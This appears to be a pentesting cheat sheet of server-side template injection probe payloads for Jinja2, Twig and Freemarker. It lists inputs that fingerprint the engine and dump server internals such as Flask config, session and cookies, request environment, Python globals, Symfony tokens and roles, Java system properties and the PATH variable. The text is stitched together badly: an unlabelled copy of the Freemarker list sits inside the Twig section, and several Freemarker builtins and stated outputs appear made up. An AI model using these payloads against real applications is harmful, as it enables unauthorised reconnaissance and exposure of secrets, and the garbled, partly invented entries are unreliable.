SSTI Engine detection list

Jinja2 Detection List

{{7*7}}
{{7*'7'}}
{{config}}
{{self}}
{{request}}
{{lipsum}}
{{cycler}}
{{joiner}}
{{namespace}}
{{7**7}}
{{[].__class__}}
{{''.__class__.__mro__}}
{{().__class__.__mro__}}
{{dict.__class__.__mro__}}
{{request.application}}
{{self.__dict__}}
{{lipsum.__globals__}}
{{cycler.__init__}}
{{joiner.__init__}}
{{namespace.__init__}}
{{config.items()}}
{{config.__dict__}}
{{config.from_envvar}}
{{config.from_object}}
{{config.from_pyfile}}
{{url_for.__globals__}}
{{get_flashed_messages.__globals__}}
{{session.items()}}
{{g.items()}}
{{request.cookies}}
{{request.headers}}
{{request.args}}
{{request.form}}
{{request.values}}
{{request.json}}
{{request.files}}
{{request.environ}}
{{request.environ['PATH_INFO']}}
{{request.environ['QUERY_STRING']}}
{{request.environ['SERVER_NAME']}}
{{request.environ['SERVER_PORT']}}
{{request.environ['REMOTE_ADDR']}}
{{request.environ['HTTP_USER_AGENT']}}
{{request.environ['HTTP_HOST']}}
{{request.environ['HTTP_REFERER']}}
{{request.environ['HTTP_COOKIE']}}

Twig (PHP) Detectoin List

{{7*7}}
{{7*'7'}}
{{_self}}
{{_self.env}}
{{app}}
{{dump(app)}}
{{constant('PHP_VERSION')}}
{{'7'~'7'}}
{{['a','b']|join}}
{{_context}}
{{_charset}}
{{_self.getTemplateName()}}
{{_self.getEnvironment()}}
{{_self.getGlobals()}}
{{app.request}}
{{app.session}}
{{app.security}}
{{app.user}}
{{app.debug}}
{{app.environment}}
{{app.version}}
{{app.getRequest()}}
{{app.getSession()}}
{{app.getUser()}}
{{app.getToken()}}
{{app.getRoles()}}
{{app.isGranted('ROLE_ADMIN')}}
{{_self.env.getFilters()|keys}}
{{_self.env.getFunctions()|keys}}
{{_self.env.getTests()|keys}}
{{_self.env.getExtensions()|keys}}
{{_self.env.getLoader()}}
{{_self.env.getCache()}}
{{_self.env.getCharset()}}
{{_self.env.getTemplateClassPrefix()}}
{{_self.env.isDebug()}}
{{_self.env.isAutoReload()}}
{{_self.env.isStrictVariables()}}
{{_self.env.getTemplateClass('index')}}
{{_self.env.getTemplate('index')}}
{{_self.env.loadTemplate('index')}}
{{_self.env.compileSource('source')}}
{{_self.env.render('template', {})}}
{{_self.env.display('template', {})}}
{{_self.env.resolveTemplate('names')}}
{{_self.env.isSandboxed()}}
{{_self.env.getSandbox()}}
{{_self.env.getPolicy()}}${7*7}
#{7*7}
${.version}
${.now}
${.main}
${.data_model}
${.locale}
${.template}
${.output_encoding}
${.url_escaping_charset}
${.time_zone}
${.current_template_name}
${1?string.sequence}
${1?string.currency}
${1?string.percent}
${.lang}
${.locale}
${.number_format}
${.boolean_format}
${.date_format}
${.time_format}
${.datetime_format}
${.template_config}
${.template_config.getTemplateUpdateDelay()}
${.template_config.getTemplateLoader()}
${.template_config.getObjectWrapper()}
${.template_config.getLocale()}
${.template_config.getTimeZone()}
${.template_config.getNumberFormat()}
${.template_config.getBooleanFormat()}
${.template_config.getDateFormat()}
${.template_config.getTimeFormat()}
${.template_config.getDateTimeFormat()}
${.template_config.getOutputEncoding()}
${.template_config.getURLEscapingCharset()}
${.template_config.getWhitespaceStripping()}
${.template_config.getCacheStorage()}
${.template_config.getTemplateLookupStrategy()}
${.template_config.getTemplateNameFormat()}
${.template_config.getAPIBuiltinEnabled()}
${.template_config.getIncompatibleImprovements()}
${statics['java.lang.System'].getProperty('os.name')}
${statics['java.lang.System'].getProperty('user.home')}
${statics['java.lang.System'].getProperty('java.version')}
${statics['java.lang.System'].getenv('PATH')}
${statics['java.lang.Runtime'].getRuntime().availableProcessors()}
${.globals}
${.vars}
${.namespace}
${.current_template_name}
${.template_name}
${.template_src}
${.template_encoding}
${.template_exists('index')?string('yes','no')}
${.getTemplate('index')}
${.getResource('index')}
${.getClass().getResource('/')}
${.getClass().getClassLoader()}
{{_self.env.getRuntime('core')}}
{{_self.env.getRuntime('security')}}
{{_self.env.getRuntime('cache')}}
{{_self.env.getRuntime('escaped')}}
{{_self.env.getRuntime('sandbox')}}


Freemarker (Java) Detection List

${7*7}               → 49
#{7*7}               → 49 (alternative syntax)
${.version}          → Shows Freemarker version number
${.now}              → Shows current date/time
${.main}             → Shows main configuration object
${.data_model}       → Shows data model passed to template
${.locale}           → Shows current locale
${.template}         → Shows template name
${.output_encoding}  → Shows output encoding
${.url_escaping_charset} → Shows URL escaping charset
${.time_zone}        → Shows time zone
${.current_template_name} → Shows current template name
${1?string.sequence} → 1, 2, 3, 4, 5 (number sequence)
${1?string.currency} → $1.00 (currency format)
${1?string.percent}  → 100% (percent format)
${.lang}             → Shows language code
${.locale}           → Shows full locale
${.number_format}    → Shows number format
${.boolean_format}   → Shows boolean format
${.date_format}      → Shows date format
${.time_format}      → Shows time format
${.datetime_format}  → Shows datetime format
${.template_config}  → Shows template configuration
${.template_config.getTemplateUpdateDelay()} → Update delay
${.template_config.getTemplateLoader()} → Template loader
${.template_config.getObjectWrapper()} → Object wrapper
${.template_config.getLocale()} → Default locale
${.template_config.getTimeZone()} → Default time zone
${.template_config.getNumberFormat()} → Default number format
${.template_config.getBooleanFormat()} → Default boolean format
${.template_config.getDateFormat()} → Default date format
${.template_config.getTimeFormat()} → Default time format
${.template_config.getDateTimeFormat()} → Default datetime format
${.template_config.getOutputEncoding()} → Output encoding
${.template_config.getURLEscapingCharset()} → URL escaping
${.template_config.getWhitespaceStripping()} → Boolean
${.template_config.getCacheStorage()} → Cache storage
${.template_config.getTemplateLookupStrategy()} → Lookup strategy
${.template_config.getTemplateNameFormat()} → Name format
${.template_config.getAPIBuiltinEnabled()} → API enabled
${.template_config.getIncompatibleImprovements()} → Version
${statics['java.lang.System'].getProperty('os.name')} → OS name
${statics['java.lang.System'].getProperty('user.home')} → User home
${statics['java.lang.System'].getProperty('java.version')} → Java version
${statics['java.lang.System'].getenv('PATH')} → PATH variable
${statics['java.lang.Runtime'].getRuntime().availableProcessors()} → CPU cores
${.globals}          → Shows global variables
${.vars}             → Shows all variables
${.namespace}        → Shows current namespace
${.current_template_name} → Current template name
${.template_name}    → Template name
${.template_src}     → Template source
${.template_encoding} → Template encoding
${.template_exists('index')?string('yes','no')} → Template exists
${.getTemplate('index')} → Loads template
${.getResource('index')} → Loads resource
${.getClass().getResource('/')} → Class resource root
${.getClass().getClassLoader()} → Class loader



